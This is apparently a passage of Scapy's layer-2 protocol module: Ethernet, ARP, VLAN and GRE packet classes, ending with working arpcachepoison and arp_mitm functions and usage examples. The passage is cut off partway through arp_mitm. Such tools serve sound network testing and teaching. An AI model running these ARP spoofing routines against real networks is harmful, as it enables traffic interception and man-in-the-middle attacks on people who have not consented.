1# SPDX-License-Identifier: GPL-2.0-only 2# This file is part of Scapy 3# See https://scapy.net/ for more information 4# Copyright (C) Philippe Biondi <phil@secdev.org> 5 6""" 7Classes and functions for layer 2 protocols. 8""" 9 10import itertools 11import socket 12import struct 13import time 14 15from scapy.ansmachine import AnsweringMachine 16from scapy.arch import get_if_addr, get_if_hwaddr 17from scapy.base_classes import Gen, Net, _ScopedIP 18from scapy.compat import chb 19from scapy.config import conf 20from scapy import consts 21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ 22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ 23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC 24from scapy.error import ( 25 ScapyNoDstMacException, 26 log_runtime, 27 warning, 28) 29from scapy.fields import ( 30 BCDFloatField, 31 BitField, 32 ByteEnumField, 33 ByteField, 34 ConditionalField, 35 FCSField, 36 FieldLenField, 37 IP6Field, 38 IPField, 39 IntEnumField, 40 IntField, 41 LenField, 42 MACField, 43 MultipleTypeField, 44 OUIField, 45 ShortEnumField, 46 ShortField, 47 SourceIP6Field, 48 SourceIPField, 49 StrFixedLenField, 50 StrLenField, 51 ThreeBytesField, 52 XByteField, 53 XIntField, 54 XShortEnumField, 55 XShortField, 56) 57from scapy.interfaces import _GlobInterfaceType, resolve_iface 58from scapy.packet import bind_layers, Packet 59from scapy.plist import ( 60 PacketList, 61 QueryAnswer, 62 SndRcvList, 63 _PacketList, 64) 65from scapy.sendrecv import sendp, srp, srp1, srploop 66from scapy.utils import ( 67 checksum, 68 hexdump, 69 hexstr, 70 in4_getnsmac, 71 in4_ismaddr, 72 inet_aton, 73 inet_ntoa, 74 mac2str, 75 pretty_list, 76 valid_mac, 77 valid_net, 78 valid_net6, 79) 80 81# Typing imports 82from typing import ( 83 Any, 84 Callable, 85 Dict, 86 Iterable, 87 List, 88 Optional, 89 Tuple, 90 Type, 91 Union, 92 cast, 93) 94from scapy.interfaces import NetworkInterface 95 96 97if conf.route is None: 98 # unused import, only to initialize conf.route 99 import scapy.route # noqa: F401 100 101 102# type definitions 103_ResolverCallable = Callable[[Packet, Packet], Optional[str]] 104 105################# 106# Tools # 107################# 108 109 110class Neighbor: 111 def __init__(self): 112 # type: () -> None 113 self.resolvers = {} # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501 114 115 def register_l3(self, l2, l3, resolve_method): 116 # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None 117 self.resolvers[l2, l3] = resolve_method 118 119 def resolve(self, l2inst, l3inst): 120 # type: (Packet, Packet) -> Optional[str] 121 k = l2inst.__class__, l3inst.__class__ 122 if k in self.resolvers: 123 return self.resolvers[k](l2inst, l3inst) 124 return None 125 126 def __repr__(self): 127 # type: () -> str 128 return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers) # noqa: E501 129 130 131conf.neighbor = Neighbor() 132 133# cache entries expire after 120s 134_arp_cache = conf.netcache.new_cache("arp_cache", 120) 135 136 137@conf.commands.register 138def getmacbyip(ip, chainCC=0): 139 # type: (str, int) -> Optional[str] 140 """ 141 Returns the destination MAC address used to reach a given IP address. 142 143 This will follow the routing table and will issue an ARP request if 144 necessary. Special cases (multicast, etc.) are also handled. 145 146 .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6. 147 """ 148 # Sanitize the IP 149 if isinstance(ip, Net): 150 ip = next(iter(ip)) 151 ip = inet_ntoa(inet_aton(ip or "0.0.0.0")) 152 153 # Multicast 154 if in4_ismaddr(ip): # mcast @ 155 mac = in4_getnsmac(inet_aton(ip)) 156 return mac 157 158 # Check the routing table 159 iff, _, gw = conf.route.route(ip) 160 161 # Broadcast case 162 if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)): 163 return "ff:ff:ff:ff:ff:ff" 164 165 # An ARP request is necessary 166 if gw != "0.0.0.0": 167 ip = gw 168 169 # Check the cache 170 mac = _arp_cache.get(ip) 171 if mac: 172 return mac 173 174 try: 175 res = srp1(Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=ip), 176 type=ETH_P_ARP, 177 iface=iff, 178 timeout=2, 179 verbose=0, 180 chainCC=chainCC, 181 nofilter=1) 182 except Exception as ex: 183 warning("getmacbyip failed on %s", ex) 184 return None 185 if res is not None: 186 mac = res.payload.hwsrc 187 _arp_cache[ip] = mac 188 return mac 189 return None 190 191 192# Fields 193 194class DestMACField(MACField): 195 def __init__(self, name): 196 # type: (str) -> None 197 MACField.__init__(self, name, None) 198 199 def i2h(self, pkt, x): 200 # type: (Optional[Packet], Optional[str]) -> str 201 if x is None and pkt is not None: 202 x = None 203 return super(DestMACField, self).i2h(pkt, x) 204 205 def i2m(self, pkt, x): 206 # type: (Optional[Packet], Optional[str]) -> bytes 207 if x is None and pkt is not None: 208 try: 209 x = conf.neighbor.resolve(pkt, pkt.payload) 210 except socket.error: 211 pass 212 if x is None: 213 if conf.raise_no_dst_mac: 214 raise ScapyNoDstMacException() 215 else: 216 x = "ff:ff:ff:ff:ff:ff" 217 warning( 218 "MAC address to reach destination not found. Using broadcast." 219 ) 220 return super(DestMACField, self).i2m(pkt, x) 221 222 223class SourceMACField(MACField): 224 __slots__ = ["getif"] 225 226 def __init__(self, name, getif=None): 227 # type: (str, Optional[Any]) -> None 228 MACField.__init__(self, name, None) 229 self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif 230 231 def i2h(self, pkt, x): 232 # type: (Optional[Packet], Optional[str]) -> str 233 if x is None: 234 iff = self.getif(pkt) 235 if iff: 236 x = resolve_iface(iff).mac 237 if x is None: 238 x = "00:00:00:00:00:00" 239 return super(SourceMACField, self).i2h(pkt, x) 240 241 def i2m(self, pkt, x): 242 # type: (Optional[Packet], Optional[Any]) -> bytes 243 return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x)) 244 245 246# Layers 247 248HARDWARE_TYPES = { 249 1: "Ethernet (10Mb)", 250 2: "Ethernet (3Mb)", 251 3: "AX.25", 252 4: "Proteon ProNET Token Ring", 253 5: "Chaos", 254 6: "IEEE 802 Networks", 255 7: "ARCNET", 256 8: "Hyperchannel", 257 9: "Lanstar", 258 10: "Autonet Short Address", 259 11: "LocalTalk", 260 12: "LocalNet", 261 13: "Ultra link", 262 14: "SMDS", 263 15: "Frame relay", 264 16: "ATM", 265 17: "HDLC", 266 18: "Fibre Channel", 267 19: "ATM", 268 20: "Serial Line", 269 21: "ATM", 270} 271 272ETHER_TYPES[0x88a8] = '802_1AD' 273ETHER_TYPES[0x88e7] = '802_1AH' 274ETHER_TYPES[ETH_P_MACSEC] = '802_1AE' 275 276 277class Ether(Packet): 278 name = "Ethernet" 279 fields_desc = [DestMACField("dst"), 280 SourceMACField("src"), 281 XShortEnumField("type", 0x9000, ETHER_TYPES)] 282 __slots__ = ["_defrag_pos"] 283 284 def hashret(self): 285 # type: () -> bytes 286 return struct.pack("H", self.type) + self.payload.hashret() 287 288 def answers(self, other): 289 # type: (Packet) -> int 290 if isinstance(other, Ether): 291 if self.type == other.type: 292 return self.payload.answers(other.payload) 293 return 0 294 295 def mysummary(self): 296 # type: () -> str 297 return self.sprintf("%src% > %dst% (%type%)") 298 299 @classmethod 300 def dispatch_hook(cls, _pkt=None, *args, **kargs): 301 # type: (Optional[bytes], *Any, **Any) -> Type[Packet] 302 if _pkt and len(_pkt) >= 14: 303 if struct.unpack("!H", _pkt[12:14])[0] <= 1500: 304 return Dot3 305 return cls 306 307 308class Dot3(Packet): 309 name = "802.3" 310 fields_desc = [DestMACField("dst"), 311 SourceMACField("src"), 312 LenField("len", None, "H")] 313 314 def extract_padding(self, s): 315 # type: (bytes) -> Tuple[bytes, bytes] 316 tmp_len = self.len 317 return s[:tmp_len], s[tmp_len:] 318 319 def answers(self, other): 320 # type: (Packet) -> int 321 if isinstance(other, Dot3): 322 return self.payload.answers(other.payload) 323 return 0 324 325 def mysummary(self): 326 # type: () -> str 327 return "802.3 %s > %s" % (self.src, self.dst) 328 329 @classmethod 330 def dispatch_hook(cls, _pkt=None, *args, **kargs): 331 # type: (Optional[Any], *Any, **Any) -> Type[Packet] 332 if _pkt and len(_pkt) >= 14: 333 if struct.unpack("!H", _pkt[12:14])[0] > 1500: 334 return Ether 335 return cls 336 337 338class LLC(Packet): 339 name = "LLC" 340 fields_desc = [XByteField("dsap", 0x00), 341 XByteField("ssap", 0x00), 342 ByteField("ctrl", 0)] 343 344 345def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]: 346 """ 347 Delegates resolving the default L2 destination address to the payload of L3. 348 """ 349 neighbor = conf.neighbor # type: Neighbor 350 return neighbor.resolve(l2, l3.payload) 351 352 353conf.neighbor.register_l3(Ether, LLC, l2_register_l3) 354conf.neighbor.register_l3(Dot3, LLC, l2_register_l3) 355 356 357COOKED_LINUX_PACKET_TYPES = { 358 0: "unicast", 359 1: "broadcast", 360 2: "multicast", 361 3: "unicast-to-another-host", 362 4: "sent-by-us" 363} 364 365 366class CookedLinux(Packet): 367 # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html 368 name = "cooked linux" 369 # from wireshark's database 370 fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), 371 XShortField("lladdrtype", 512), 372 ShortField("lladdrlen", 0), 373 StrFixedLenField("src", b"", 8), 374 XShortEnumField("proto", 0x800, ETHER_TYPES)] 375 376 377class CookedLinuxV2(CookedLinux): 378 # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html 379 name = "cooked linux v2" 380 fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES), 381 ShortField("reserved", 0), 382 IntField("ifindex", 0), 383 XShortField("lladdrtype", 512), 384 ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), 385 ByteField("lladdrlen", 0), 386 StrFixedLenField("src", b"", 8)] 387 388 389class MPacketPreamble(Packet): 390 # IEEE 802.3br Figure 99-3 391 name = "MPacket Preamble" 392 fields_desc = [StrFixedLenField("preamble", b"", length=8), 393 FCSField("fcs", 0, fmt="!I")] 394 395 396class SNAP(Packet): 397 name = "SNAP" 398 fields_desc = [OUIField("OUI", 0x000000), 399 XShortEnumField("code", 0x000, ETHER_TYPES)] 400 401 402conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3) 403 404 405class Dot1Q(Packet): 406 name = "802.1Q" 407 aliastypes = [Ether] 408 fields_desc = [BitField("prio", 0, 3), 409 BitField("dei", 0, 1), 410 BitField("vlan", 1, 12), 411 XShortEnumField("type", 0x0000, ETHER_TYPES)] 412 deprecated_fields = { 413 "id": ("dei", "2.5.0"), 414 } 415 416 def answers(self, other): 417 # type: (Packet) -> int 418 if isinstance(other, Dot1Q): 419 if ((self.type == other.type) and 420 (self.vlan == other.vlan)): 421 return self.payload.answers(other.payload) 422 else: 423 return self.payload.answers(other) 424 return 0 425 426 def default_payload_class(self, pay): 427 # type: (bytes) -> Type[Packet] 428 if self.type <= 1500: 429 return LLC 430 return conf.raw_layer 431 432 def extract_padding(self, s): 433 # type: (bytes) -> Tuple[bytes, Optional[bytes]] 434 if self.type <= 1500: 435 return s[:self.type], s[self.type:] 436 return s, None 437 438 def mysummary(self): 439 # type: () -> str 440 if isinstance(self.underlayer, Ether): 441 return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%") # noqa: E501 442 else: 443 return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%") 444 445 446conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3) 447 448 449class STP(Packet): 450 name = "Spanning Tree Protocol" 451 fields_desc = [ShortField("proto", 0), 452 ByteField("version", 0), 453 ByteField("bpdutype", 0), 454 ByteField("bpduflags", 0), 455 ShortField("rootid", 0), 456 MACField("rootmac", ETHER_ANY), 457 IntField("pathcost", 0), 458 ShortField("bridgeid", 0), 459 MACField("bridgemac", ETHER_ANY), 460 ShortField("portid", 0), 461 BCDFloatField("age", 1), 462 BCDFloatField("maxage", 20), 463 BCDFloatField("hellotime", 2), 464 BCDFloatField("fwddelay", 15)] 465 466 467class ARP(Packet): 468 name = "ARP" 469 fields_desc = [ 470 XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES), 471 XShortEnumField("ptype", 0x0800, ETHER_TYPES), 472 FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"), 473 FieldLenField("plen", None, fmt="B", length_of="psrc"), 474 ShortEnumField("op", 1, { 475 "who-has": 1, 476 "is-at": 2, 477 "RARP-req": 3, 478 "RARP-rep": 4, 479 "Dyn-RARP-req": 5, 480 "Dyn-RAR-rep": 6, 481 "Dyn-RARP-err": 7, 482 "InARP-req": 8, 483 "InARP-rep": 9 484 }), 485 MultipleTypeField( 486 [ 487 (SourceMACField("hwsrc"), 488 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6, 489 lambda pkt, val: pkt.hwtype == 1 and ( 490 pkt.hwlen == 6 or (pkt.hwlen is None and 491 (val is None or len(val) == 6 or 492 valid_mac(val))) 493 ))), 494 ], 495 StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen), 496 ), 497 MultipleTypeField( 498 [ 499 (SourceIPField("psrc"), 500 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4, 501 lambda pkt, val: pkt.ptype == 0x0800 and ( 502 pkt.plen == 4 or (pkt.plen is None and 503 (val is None or valid_net(val))) 504 ))), 505 (SourceIP6Field("psrc"), 506 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16, 507 lambda pkt, val: pkt.ptype == 0x86dd and ( 508 pkt.plen == 16 or (pkt.plen is None and 509 (val is None or valid_net6(val))) 510 ))), 511 ], 512 StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen), 513 ), 514 MultipleTypeField( 515 [ 516 (MACField("hwdst", ETHER_ANY), 517 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6, 518 lambda pkt, val: pkt.hwtype == 1 and ( 519 pkt.hwlen == 6 or (pkt.hwlen is None and 520 (val is None or len(val) == 6 or 521 valid_mac(val))) 522 ))), 523 ], 524 StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen), 525 ), 526 MultipleTypeField( 527 [ 528 (IPField("pdst", "0.0.0.0"), 529 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4, 530 lambda pkt, val: pkt.ptype == 0x0800 and ( 531 pkt.plen == 4 or (pkt.plen is None and 532 (val is None or valid_net(val))) 533 ))), 534 (IP6Field("pdst", "::"), 535 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16, 536 lambda pkt, val: pkt.ptype == 0x86dd and ( 537 pkt.plen == 16 or (pkt.plen is None and 538 (val is None or valid_net6(val))) 539 ))), 540 ], 541 StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen), 542 ), 543 ] 544 545 def hashret(self): 546 # type: () -> bytes 547 return struct.pack(">HHH", self.hwtype, self.ptype, 548 ((self.op + 1) // 2)) + self.payload.hashret() 549 550 def answers(self, other): 551 # type: (Packet) -> int 552 if not isinstance(other, ARP): 553 return False 554 if self.op != other.op + 1: 555 return False 556 # We use a loose comparison on psrc vs pdst to catch answers 557 # with ARP leaks 558 self_psrc = self.get_field('psrc').i2m(self, self.psrc) # type: bytes 559 other_pdst = other.get_field('pdst').i2m(other, other.pdst) \ 560 # type: bytes 561 return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)] 562 563 def route(self): 564 # type: () -> Tuple[Optional[str], Optional[str], Optional[str]] 565 fld, dst = cast(Tuple[MultipleTypeField, str], 566 self.getfield_and_val("pdst")) 567 fld_inner, dst = fld._find_fld_pkt_val(self, dst) 568 scope = None 569 if isinstance(dst, (Net, _ScopedIP)): 570 scope = dst.scope 571 if isinstance(dst, Gen): 572 dst = next(iter(dst)) 573 if isinstance(fld_inner, IP6Field): 574 return conf.route6.route(dst, dev=scope) 575 elif isinstance(fld_inner, IPField): 576 return conf.route.route(dst, dev=scope) 577 else: 578 return None, None, None 579 580 def extract_padding(self, s): 581 # type: (bytes) -> Tuple[bytes, bytes] 582 return b"", s 583 584 def mysummary(self): 585 # type: () -> str 586 if self.op == 1: 587 return self.sprintf("ARP who has %pdst% says %psrc%") 588 if self.op == 2: 589 return self.sprintf("ARP is at %hwsrc% says %psrc%") 590 return self.sprintf("ARP %op% %psrc% > %pdst%") 591 592 593def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]: 594 """ 595 Resolves the default L2 destination address when ARP is used. 596 """ 597 if l3.op == 1: # who-has 598 return "ff:ff:ff:ff:ff:ff" 599 elif l3.op == 2: # is-at 600 log_runtime.warning( 601 "You should be providing the Ethernet destination MAC address when " 602 "sending an is-at ARP." 603 ) 604 # Need ARP request to send ARP request... 605 plen = l3.get_field("pdst").i2len(l3, l3.pdst) 606 if plen == 4: 607 return getmacbyip(l3.pdst) 608 elif plen == 32: 609 from scapy.layers.inet6 import getmacbyip6 610 return getmacbyip6(l3.pdst) 611 # Can't even do that 612 log_runtime.warning( 613 "You should be providing the Ethernet destination mac when sending this " 614 "kind of ARP packets." 615 ) 616 return None 617 618 619conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp) 620 621 622class GRErouting(Packet): 623 name = "GRE routing information" 624 fields_desc = [ShortField("address_family", 0), 625 ByteField("SRE_offset", 0), 626 FieldLenField("SRE_len", None, "routing_info", "B"), 627 StrLenField("routing_info", b"", 628 length_from=lambda pkt: pkt.SRE_len), 629 ] 630 631 632class GRE(Packet): 633 name = "GRE" 634 deprecated_fields = { 635 "seqence_number": ("sequence_number", "2.4.4"), 636 } 637 fields_desc = [BitField("chksum_present", 0, 1), 638 BitField("routing_present", 0, 1), 639 BitField("key_present", 0, 1), 640 BitField("seqnum_present", 0, 1), 641 BitField("strict_route_source", 0, 1), 642 BitField("recursion_control", 0, 3), 643 BitField("flags", 0, 5), 644 BitField("version", 0, 3), 645 XShortEnumField("proto", 0x0000, ETHER_TYPES), 646 ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501 647 ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501 648 ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1), # noqa: E501 649 ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1), # noqa: E501 650 ] 651 652 @classmethod 653 def dispatch_hook(cls, _pkt=None, *args, **kargs): 654 # type: (Optional[Any], *Any, **Any) -> Type[Packet] 655 if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b: 656 return GRE_PPTP 657 return cls 658 659 def post_build(self, p, pay): 660 # type: (bytes, bytes) -> bytes 661 p += pay 662 if self.chksum_present and self.chksum is None: 663 c = checksum(p) 664 p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:] 665 return p 666 667 668class GRE_PPTP(GRE): 669 670 """ 671 Enhanced GRE header used with PPTP 672 RFC 2637 673 """ 674 675 name = "GRE PPTP" 676 deprecated_fields = { 677 "seqence_number": ("sequence_number", "2.4.4"), 678 } 679 fields_desc = [BitField("chksum_present", 0, 1), 680 BitField("routing_present", 0, 1), 681 BitField("key_present", 1, 1), 682 BitField("seqnum_present", 0, 1), 683 BitField("strict_route_source", 0, 1), 684 BitField("recursion_control", 0, 3), 685 BitField("acknum_present", 0, 1), 686 BitField("flags", 0, 4), 687 BitField("version", 1, 3), 688 XShortEnumField("proto", 0x880b, ETHER_TYPES), 689 ShortField("payload_len", None), 690 ShortField("call_id", None), 691 ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1), # noqa: E501 692 ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)] # noqa: E501 693 694 def post_build(self, p, pay): 695 # type: (bytes, bytes) -> bytes 696 p += pay 697 if self.payload_len is None: 698 pay_len = len(pay) 699 p = p[:4] + chb((pay_len >> 8) & 0xff) + chb(pay_len & 0xff) + p[6:] # noqa: E501 700 return p 701 702 703# *BSD loopback layer 704 705class LoIntEnumField(IntEnumField): 706 707 def m2i(self, pkt, x): 708 # type: (Optional[Packet], int) -> int 709 return x >> 24 710 711 def i2m(self, pkt, x): 712 # type: (Optional[Packet], Union[List[int], int, None]) -> int 713 return cast(int, x) << 24 714 715 716# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c 717# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html 718LOOPBACK_TYPES = {0x2: "IPv4", 719 0x7: "OSI", 720 0x10: "Appletalk", 721 0x17: "Netware IPX/SPX", 722 0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"} 723 724 725# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available. 726# This is to be compatible with both tcpdump and tshark 727 728class Loopback(Packet): 729 r""" 730 \*BSD loopback layer 731 """ 732 __slots__ = ["_defrag_pos"] 733 name = "Loopback" 734 if consts.OPENBSD: 735 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] 736 else: 737 fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)] 738 739 740if consts.OPENBSD: 741 LoopbackOpenBSD = Loopback 742else: 743 class LoopbackOpenBSD(Loopback): 744 name = "OpenBSD Loopback" 745 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] 746 747 748class Dot1AD(Dot1Q): 749 name = '802_1AD' 750 751 752class Dot1AH(Packet): 753 name = "802_1AH" 754 fields_desc = [BitField("prio", 0, 3), 755 BitField("dei", 0, 1), 756 BitField("nca", 0, 1), 757 BitField("res1", 0, 1), 758 BitField("res2", 0, 2), 759 ThreeBytesField("isid", 0)] 760 761 def answers(self, other): 762 # type: (Packet) -> int 763 if isinstance(other, Dot1AH): 764 if self.isid == other.isid: 765 return self.payload.answers(other.payload) 766 return 0 767 768 def mysummary(self): 769 # type: () -> str 770 return self.sprintf("802.1ah (isid=%Dot1AH.isid%") 771 772 773conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3) 774 775 776bind_layers(Dot3, LLC) 777bind_layers(Ether, LLC, type=122) 778bind_layers(Ether, LLC, type=34928) 779bind_layers(Ether, Dot1Q, type=33024) 780bind_layers(Ether, Dot1AD, type=0x88a8) 781bind_layers(Ether, Dot1AH, type=0x88e7) 782bind_layers(Dot1AD, Dot1AD, type=0x88a8) 783bind_layers(Dot1AD, Dot1Q, type=0x8100) 784bind_layers(Dot1AD, Dot1AH, type=0x88e7) 785bind_layers(Dot1Q, Dot1AD, type=0x88a8) 786bind_layers(Dot1Q, Dot1AH, type=0x88e7) 787bind_layers(Dot1AH, Ether) 788bind_layers(Ether, Ether, type=1) 789bind_layers(Ether, ARP, type=2054) 790bind_layers(CookedLinux, LLC, proto=122) 791bind_layers(CookedLinux, Dot1Q, proto=33024) 792bind_layers(CookedLinux, Dot1AD, type=0x88a8) 793bind_layers(CookedLinux, Dot1AH, type=0x88e7) 794bind_layers(CookedLinux, Ether, proto=1) 795bind_layers(CookedLinux, ARP, proto=2054) 796bind_layers(MPacketPreamble, Ether) 797bind_layers(GRE, LLC, proto=122) 798bind_layers(GRE, Dot1Q, proto=33024) 799bind_layers(GRE, Dot1AD, type=0x88a8) 800bind_layers(GRE, Dot1AH, type=0x88e7) 801bind_layers(GRE, Ether, proto=0x6558) 802bind_layers(GRE, ARP, proto=2054) 803bind_layers(GRE, GRErouting, {"routing_present": 1}) 804bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0}) 805bind_layers(GRErouting, GRErouting) 806bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3) 807bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3) 808bind_layers(SNAP, Dot1Q, code=33024) 809bind_layers(SNAP, Dot1AD, type=0x88a8) 810bind_layers(SNAP, Dot1AH, type=0x88e7) 811bind_layers(SNAP, Ether, code=1) 812bind_layers(SNAP, ARP, code=2054) 813bind_layers(SNAP, STP, code=267) 814 815conf.l2types.register(ARPHDR_ETHER, Ether) 816conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether) 817conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether) 818conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3) 819conf.l2types.register(DLT_LINUX_SLL, CookedLinux) 820conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2) 821conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble) 822conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux) 823conf.l2types.register(DLT_NULL, Loopback) 824conf.l2types.register(DLT_LOOP, LoopbackOpenBSD) 825 826conf.l3types.register(ETH_P_ARP, ARP) 827 828 829# Techniques 830 831 832@conf.commands.register 833def arpcachepoison( 834 target, # type: Union[str, List[str]] 835 addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] 836 broadcast=False, # type: bool 837 count=None, # type: Optional[int] 838 interval=15, # type: int 839 **kwargs, # type: Any 840): 841 # type: (...) -> None 842 """Poison targets' ARP cache 843 844 :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs 845 or the subnet that will be poisoned. 846 :param addresses: Can be either a string, a tuple of a list of tuples. 847 If it's a string, it's the IP to advertise to the victim, 848 with the local interface's MAC. If it's a tuple, 849 it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")]. 850 "IP" can be a subnet of course. 851 :param broadcast: Use broadcast ethernet 852 853 Examples for target "192.168.0.2":: 854 855 >>> arpcachepoison("192.168.0.2", "192.168.0.1") 856 >>> arpcachepoison("192.168.0.1/24", "192.168.0.1") 857 >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1") 858 >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0"))) 859 >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"), 860 ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")]) 861 862 """ 863 if isinstance(target, str): 864 targets = Net(target) # type: Union[Net, List[str]] 865 str_target = target 866 else: 867 targets = target 868 str_target = target[0] 869 if isinstance(addresses, str): 870 couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))] 871 elif isinstance(addresses, tuple): 872 couple_list = [addresses] 873 else: 874 couple_list = addresses 875 p: List[Packet] = [ 876 Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) / 877 ARP(op="who-has", psrc=x, pdst=targets, 878 hwsrc=y, hwdst="00:00:00:00:00:00") 879 for x, y in couple_list 880 ] 881 if count is not None: 882 sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs) 883 return 884 try: 885 while True: 886 sendp(p, iface_hint=str_target, **kwargs) 887 time.sleep(interval) 888 except KeyboardInterrupt: 889 pass 890 891 892@conf.commands.register 893def arp_mitm( 894 ip1, # type: str 895 ip2, # type: str 896 mac1=None, # type: Optional[Union[str, List[str]]] 897 mac2=None, # type: Optional[Union[str, List[str]]] 898 broadcast=False, # type: bool 899 target_mac=None, # type: Optional[str] 900 iface=None, # type: Optional[_GlobInterfaceType] 901 inter=3, # type: int 902): 903 # type: (...) -> None 904 r"""ARP MitM: poison 2 target's ARP cache 905 906 :param ip1: IPv4 of the first machine 907 :param ip2: IPv4 of the second machine 908 :param mac1: MAC of the first machine (optional: will ARP otherwise) 909 :param mac2: MAC of the second machine (optional: will ARP otherwise) 910 :param broadcast: if True, will use broadcast mac for MitM by default 911 :param target_mac: MAC of the attacker (optional: default to the interface's one) 912 :param iface: the network interface. (optional: default, route for ip1) 913 914 Example usage:: 915 916 $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface 917 $ sysctl net.ipv4.ip_forward=1 918 $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1 919 $ sudo scapy 920 >>> arp_mitm("192.168.122.156", "192.168.122.17") 921 922 Alternative usages: 923 >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1") 924 >>> arp_mitm("10.0.0.1", "10.1.1.2", 925 ... target_mac="aa:aa:aa:aa:aa:aa", 926 ... mac2="00:1e:eb:bf:c1:ab") 927 928 .. warning:: 929 If using a subnet, this will first perform an arping, unless broadcast is on! 930 931 Remember to change the sysctl settings back.. 932 """ 933 if not iface: 934 iface = conf.route.route(ip1)[0] 935 if not target_mac: 936 target_mac = get_if_hwaddr(iface) 937 938 def _tups(ip, mac): 939 # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]] 940 if mac is None: 941 if broadcast: 942 # ip can be a Net/list/etc and will be iterated upon while sending 943 return [(ip, "ff:ff:ff:ff:ff:ff")] 944 return [(x.query.pdst, x.answer.hwsrc) 945 for x in arping(ip, verbose=0, iface=iface)[0]] 946 elif isinstance(mac, list): 947 return [(ip, x) for x in mac] 948 else: 949 return [(ip, mac)] 950 951 tup1 = _tups(ip1, mac1) 952 if not tup1: 953 raise OSError(f"Could not resolve {ip1}") 954 tup2 = _tups(ip2, mac2) 955 if not tup2: 956 raise OSError(f"Could not resolve {ip2}") 957 print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % ( 958 [x[1] for x in tup1], 959 [x[1] for x in tup2], 960 )) 961 # We loop who-has requests 962 srploop( 963 list(itertools.chain( 964 (x 965 for ipa, maca in tup1 966 for ipb, _ in tup2 967 if ipb != ipa 968 for x 